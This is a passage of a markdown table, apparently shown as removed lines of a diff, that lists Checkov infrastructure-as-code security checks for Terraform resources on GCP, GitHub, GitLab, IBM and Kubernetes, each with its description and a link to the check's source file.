-| 1758 | CKV2_GCP_8      | resource | google_kms_key_ring                                     | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                   |
-| 1759 | CKV2_GCP_8      | resource | google_kms_key_ring_iam_binding                         | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                   |
-| 1760 | CKV2_GCP_8      | resource | google_kms_key_ring_iam_member                          | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                   |
-| 1761 | CKV2_GCP_9      | resource | google_container_registry                               | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)             |
-| 1762 | CKV2_GCP_9      | resource | google_storage_bucket_iam_binding                       | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)             |
-| 1763 | CKV2_GCP_9      | resource | google_storage_bucket_iam_member                        | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)             |
-| 1764 | CKV2_GCP_10     | resource | google_cloudfunctions_function                          | Ensure GCP Cloud Function HTTP trigger is secured                                                                                                                                                        | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml)                                                   |
-| 1765 | CKV2_GCP_11     | resource | google_project_services                                 | Ensure GCP GCR Container Vulnerability Scanning is enabled                                                                                                                                               | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml)                               |
-| 1766 | CKV2_GCP_12     | resource | google_compute_firewall                                 | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports                                                                                                                      | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml)                   |
-| 1767 | CKV2_GCP_13     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_duration' is set to 'on'                                                                                                                                            | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml)                   |
-| 1768 | CKV2_GCP_14     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off'                                                                                                                                     | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml)     |
-| 1769 | CKV2_GCP_15     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off'                                                                                                                                       | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml)         |
-| 1770 | CKV2_GCP_16     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off'                                                                                                                                      | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml)       |
-| 1771 | CKV2_GCP_17     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off'                                                                                                                                    | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml)   |
-| 1772 | CKV2_GCP_18     | resource | google_compute_network                                  | Ensure GCP network defines a firewall and does not use the default firewall                                                                                                                              | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml)                                         |
-| 1773 | CKV2_GCP_19     | resource | google_container_cluster                                | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled                                                                                                                              | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml) |
-| 1774 | CKV2_GCP_20     | resource | google_sql_database_instance                            | Ensure MySQL DB instance has point-in-time recovery backup configured                                                                                                                                    | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml)   |
-| 1775 | CKV2_GCP_21     | resource | google_notebooks_instance                               | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                          | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml)                                             |
-| 1776 | CKV2_GCP_22     | resource | google_document_ai_processor                            | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK)                                                                                                                            | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml)                                   |
-| 1777 | CKV2_GCP_23     | resource | google_document_ai_warehouse_location                   | Ensure Document AI Warehouse Location is configured to use a Customer Managed Key (CMK)                                                                                                                  | Terraform | [GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIWarehouseLocationEncryptedWithCMK.yaml)                   |
-| 1778 | CKV2_GCP_24     | resource | google_vertex_ai_endpoint                               | Ensure Vertex AI endpoint uses a Customer Managed Key (CMK)                                                                                                                                              | Terraform | [GCPVertexAIEndpointEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIEndpointEncryptedWithCMK.yaml)                                         |
-| 1779 | CKV2_GCP_25     | resource | google_vertex_ai_featurestore                           | Ensure Vertex AI featurestore uses a Customer Managed Key (CMK)                                                                                                                                          | Terraform | [GCPVertexAIFeaturestoreEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIFeaturestoreEncryptedWithCMK.yaml)                                 |
-| 1780 | CKV2_GCP_26     | resource | google_vertex_ai_tensorboard                            | Ensure Vertex AI tensorboard uses a Customer Managed Key (CMK)                                                                                                                                           | Terraform | [GCPVertexAITensorboardEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAITensorboardEncryptedWithCMK.yaml)                                   |
-| 1781 | CKV2_GCP_27     | resource | google_workbench_instance                               | Ensure Vertex AI workbench instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                | Terraform | [GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceEncryptedWithCMK.yaml)                           |
-| 1782 | CKV2_GCP_28     | resource | google_workbench_instance                               | Ensure Vertex AI workbench instances are private                                                                                                                                                         | Terraform | [GCPVertexWorkbenchInstanceNoPublicIp.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexWorkbenchInstanceNoPublicIp.yaml)                                       |
-| 1783 | CKV2_GCP_29     | resource | google_dialogflow_agent                                 | Ensure logging is enabled for Dialogflow agents                                                                                                                                                          | Terraform | [GCPDialogFlowAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowAgentLoggingEnabled.yaml)                                               |
-| 1784 | CKV2_GCP_30     | resource | google_dialogflow_cx_agent                              | Ensure logging is enabled for Dialogflow CX agents                                                                                                                                                       | Terraform | [GCPDialogFlowCxAgentLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxAgentLoggingEnabled.yaml)                                           |
-| 1785 | CKV2_GCP_31     | resource | google_dialogflow_cx_webhook                            | Ensure logging is enabled for Dialogflow CX webhooks                                                                                                                                                     | Terraform | [GCPDialogFlowCxWebhookLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDialogFlowCxWebhookLoggingEnabled.yaml)                                       |
-| 1786 | CKV2_GCP_32     | resource | google_tpu_v2_vm                                        | Ensure TPU v2 is private                                                                                                                                                                                 | Terraform | [GCPTpuV2VmPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPTpuV2VmPrivateEndpoint.yaml)                                                             |
-| 1787 | CKV2_GCP_33     | resource | google_vertex_ai_endpoint                               | Ensure Vertex AI endpoint is private                                                                                                                                                                     | Terraform | [GCPVertexAIPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateEndpoint.yaml)                                                           |
-| 1788 | CKV2_GCP_34     | resource | google_vertex_ai_index_endpoint                         | Ensure Vertex AI index endpoint is private                                                                                                                                                               | Terraform | [GCPVertexAIPrivateIndexEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexAIPrivateIndexEndpoint.yaml)                                                 |
-| 1789 | CKV2_GCP_35     | resource | google_notebooks_runtime                                | Ensure Vertex AI runtime is encrypted with a Customer Managed Key (CMK)                                                                                                                                  | Terraform | [GCPVertexRuntimeEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimeEncryptedWithCMK.yaml)                                               |
-| 1790 | CKV2_GCP_36     | resource | google_notebooks_runtime                                | Ensure Vertex AI runtime is private                                                                                                                                                                      | Terraform | [GCPVertexRuntimePrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexRuntimePrivate.yaml)                                                                 |
-| 1791 | CKV_GIT_1       | resource | github_repository                                       | Ensure GitHub repository is Private                                                                                                                                                                      | Terraform | [PrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/PrivateRepo.py)                                                                                              |
-| 1792 | CKV_GIT_2       | resource | github_repository_webhook                               | Ensure GitHub repository webhooks are using HTTPS                                                                                                                                                        | Terraform | [WebhookInsecureSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/WebhookInsecureSsl.py)                                                                                |
-| 1793 | CKV_GIT_3       | resource | github_repository                                       | Ensure GitHub repository has vulnerability alerts enabled                                                                                                                                                | Terraform | [RepositoryEnableVulnerabilityAlerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/RepositoryEnableVulnerabilityAlerts.py)                                              |
-| 1794 | CKV_GIT_4       | resource | github_actions_environment_secret                       | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                    |
-| 1795 | CKV_GIT_4       | resource | github_actions_organization_secret                      | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                    |
-| 1796 | CKV_GIT_4       | resource | github_actions_secret                                   | Ensure GitHub Actions secrets are encrypted                                                                                                                                                              | Terraform | [SecretsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/SecretsEncrypted.py)                                                                                    |
-| 1797 | CKV_GIT_5       | resource | github_branch_protection                                | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                            |
-| 1798 | CKV_GIT_5       | resource | github_branch_protection_v3                             | GitHub pull requests should require at least 2 approvals                                                                                                                                                 | Terraform | [BranchProtectionReviewNumTwo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionReviewNumTwo.py)                                                            |
-| 1799 | CKV_GIT_6       | resource | github_branch_protection                                | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                            |
-| 1800 | CKV_GIT_6       | resource | github_branch_protection_v3                             | Ensure GitHub branch protection rules requires signed commits                                                                                                                                            | Terraform | [BranchProtectionRequireSignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/github/BranchProtectionRequireSignedCommits.py)                                            |
-| 1801 | CKV2_GIT_1      | resource | github_repository                                       | Ensure each Repository has branch protection associated                                                                                                                                                  | Terraform | [RepositoryHasBranchProtection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/github/RepositoryHasBranchProtection.yaml)                                                  |
-| 1802 | CKV_GLB_1       | resource | gitlab_project                                          | Ensure at least two approving reviews are required to merge a GitLab MR                                                                                                                                  | Terraform | [RequireTwoApprovalsToMerge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RequireTwoApprovalsToMerge.py)                                                                |
-| 1803 | CKV_GLB_2       | resource | gitlab_branch_protection                                | Ensure GitLab branch protection rules does not allow force pushes                                                                                                                                        | Terraform | [ForcePushDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/ForcePushDisabled.py)                                                                                  |
-| 1804 | CKV_GLB_3       | resource | gitlab_project                                          | Ensure GitLab prevent secrets is enabled                                                                                                                                                                 | Terraform | [PreventSecretsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/PreventSecretsEnabled.py)                                                                          |
-| 1805 | CKV_GLB_4       | resource | gitlab_project                                          | Ensure GitLab commits are signed                                                                                                                                                                         | Terraform | [RejectUnsignedCommits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gitlab/RejectUnsignedCommits.py)                                                                          |
-| 1806 | CKV2_IBM_1      | resource | ibm_is_lb                                               | Ensure load balancer for VPC is private (disable public access)                                                                                                                                          | Terraform | [IBM_LoadBalancerforVPCisPrivate.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_LoadBalancerforVPCisPrivate.yaml)                                                 |
-| 1807 | CKV2_IBM_2      | resource | ibm_is_vpc                                              | Ensure VPC classic access is disabled                                                                                                                                                                    | Terraform | [IBM_VPCclassicAccessIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_VPCclassicAccessIsDisabled.yaml)                                                   |
-| 1808 | CKV2_IBM_3      | resource | ibm_iam_account_settings                                | Ensure API key creation is restricted in account settings                                                                                                                                                | Terraform | [IBM_RestrictAPIkeyCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictAPIkeyCreationInAccountSettings.yaml)                         |
-| 1809 | CKV2_IBM_4      | resource | ibm_iam_account_settings                                | Ensure Multi-Factor Authentication (MFA) is enabled at the account level                                                                                                                                 | Terraform | [IBM_EnableMFAatAccountLevel.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_EnableMFAatAccountLevel.yaml)                                                         |
-| 1810 | CKV2_IBM_5      | resource | ibm_iam_account_settings                                | Ensure Service ID creation is restricted in account settings                                                                                                                                             | Terraform | [IBM_RestrictServiceIDCreationInAccountSettings.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_RestrictServiceIDCreationInAccountSettings.yaml)                   |
-| 1811 | CKV2_IBM_6      | resource | ibm_database                                            | Ensure Databases network access is restricted to a specific IP range                                                                                                                                     | Terraform | [IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_DatabasesNWaccessRestrictedToSpecificIPrange.yaml)               |
-| 1812 | CKV2_IBM_7      | resource | ibm_container_cluster                                   | Ensure Kubernetes clusters are accessible by using private endpoint and NOT public endpoint                                                                                                              | Terraform | [IBM_K8sClustersAccessibleViaPrivateEndPt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ibm/IBM_K8sClustersAccessibleViaPrivateEndPt.yaml)                               |
-| 1813 | CKV_K8S_1       | resource | kubernetes_pod_security_policy                          | Do not admit containers wishing to share the host process ID namespace                                                                                                                                   | Terraform | [ShareHostPIDPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostPIDPSP.py)                                                                                  |
-| 1814 | CKV_K8S_2       | resource | kubernetes_pod_security_policy                          | Do not admit privileged containers                                                                                                                                                                       | Terraform | [PrivilegedContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PrivilegedContainerPSP.py)                                                                    |
-| 1815 | CKV_K8S_3       | resource | kubernetes_pod_security_policy                          | Do not admit containers wishing to share the host IPC namespace                                                                                                                                          | Terraform | [ShareHostIPCPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ShareHostIPCPSP.py)                                                                                  |
-| 1816 | CKV_K8S_4       | resource | kubernetes_pod_security_policy                          | Do not admit containers wishing to share the host network namespace                                                                                                                                      | Terraform | [SharedHostNetworkNamespacePSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SharedHostNetworkNamespacePSP.py)                                                      |
-| 1817 | CKV_K8S_5       | resource | kubernetes_pod_security_policy                          | Containers should not run with allowPrivilegeEscalation                                                                                                                                                  | Terraform | [AllowPrivilegeEscalationPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowPrivilegeEscalationPSP.py)                                                          |
-| 1818 | CKV_K8S_6       | resource | kubernetes_pod_security_policy                          | Do not admit root containers                                                                                                                                                                             | Terraform | [RootContainerPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/RootContainerPSP.py)                                                                                |
-| 1819 | CKV_K8S_7       | resource | kubernetes_pod_security_policy                          | Do not admit containers with the NET_RAW capability                                                                                                                                                      | Terraform | [DropCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilitiesPSP.py)                                                                          |
-| 1820 | CKV_K8S_8       | resource | kubernetes_deployment                                   | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 1821 | CKV_K8S_8       | resource | kubernetes_deployment_v1                                | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 1822 | CKV_K8S_8       | resource | kubernetes_pod                                          | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 1823 | CKV_K8S_8       | resource | kubernetes_pod_v1                                       | Liveness Probe Should be Configured                                                                                                                                                                      | Terraform | [LivenessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/LivenessProbe.py)                                                                                      |
-| 1824 | CKV_K8S_9       | resource | kubernetes_deployment                                   | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 1825 | CKV_K8S_9       | resource | kubernetes_deployment_v1                                | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 1826 | CKV_K8S_9       | resource | kubernetes_pod                                          | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 1827 | CKV_K8S_9       | resource | kubernetes_pod_v1                                       | Readiness Probe Should be Configured                                                                                                                                                                     | Terraform | [ReadinessProbe.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ReadinessProbe.py)                                                                                    |
-| 1828 | CKV_K8S_10      | resource | kubernetes_deployment                                   | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 1829 | CKV_K8S_10      | resource | kubernetes_deployment_v1                                | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 1830 | CKV_K8S_10      | resource | kubernetes_pod                                          | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 1831 | CKV_K8S_10      | resource | kubernetes_pod_v1                                       | CPU requests should be set                                                                                                                                                                               | Terraform | [CPURequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPURequests.py)                                                                                          |
-| 1832 | CKV_K8S_11      | resource | kubernetes_deployment                                   | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 1833 | CKV_K8S_11      | resource | kubernetes_deployment_v1                                | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 1834 | CKV_K8S_11      | resource | kubernetes_pod                                          | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 1835 | CKV_K8S_11      | resource | kubernetes_pod_v1                                       | CPU Limits should be set                                                                                                                                                                                 | Terraform | [CPULimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/CPULimits.py)                                                                                              |
-| 1836 | CKV_K8S_12      | resource | kubernetes_deployment                                   | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 1837 | CKV_K8S_12      | resource | kubernetes_deployment_v1                                | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 1838 | CKV_K8S_12      | resource | kubernetes_pod                                          | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 1839 | CKV_K8S_12      | resource | kubernetes_pod_v1                                       | Memory Limits should be set                                                                                                                                                                              | Terraform | [MemoryLimits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryLimits.py)                                                                                        |
-| 1840 | CKV_K8S_13      | resource | kubernetes_deployment                                   | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 1841 | CKV_K8S_13      | resource | kubernetes_deployment_v1                                | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 1842 | CKV_K8S_13      | resource | kubernetes_pod                                          | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 1843 | CKV_K8S_13      | resource | kubernetes_pod_v1                                       | Memory requests should be set                                                                                                                                                                            | Terraform | [MemoryRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MemoryRequests.py)                                                                                    |
-| 1844 | CKV_K8S_14      | resource | kubernetes_deployment                                   | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 1845 | CKV_K8S_14      | resource | kubernetes_deployment_v1                                | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 1846 | CKV_K8S_14      | resource | kubernetes_pod                                          | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 1847 | CKV_K8S_14      | resource | kubernetes_pod_v1                                       | Image Tag should be fixed - not latest or blank                                                                                                                                                          | Terraform | [ImageTagFixed.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageTagFixed.py)                                                                                      |
-| 1848 | CKV_K8S_15      | resource | kubernetes_deployment                                   | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 1849 | CKV_K8S_15      | resource | kubernetes_deployment_v1                                | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 1850 | CKV_K8S_15      | resource | kubernetes_pod                                          | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
-| 1851 | CKV_K8S_15      | resource | kubernetes_pod_v1                                       | Image Pull Policy should be Always                                                                                                                                                                       | Terraform | [ImagePullPolicyAlways.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImagePullPolicyAlways.py)                                                                      |
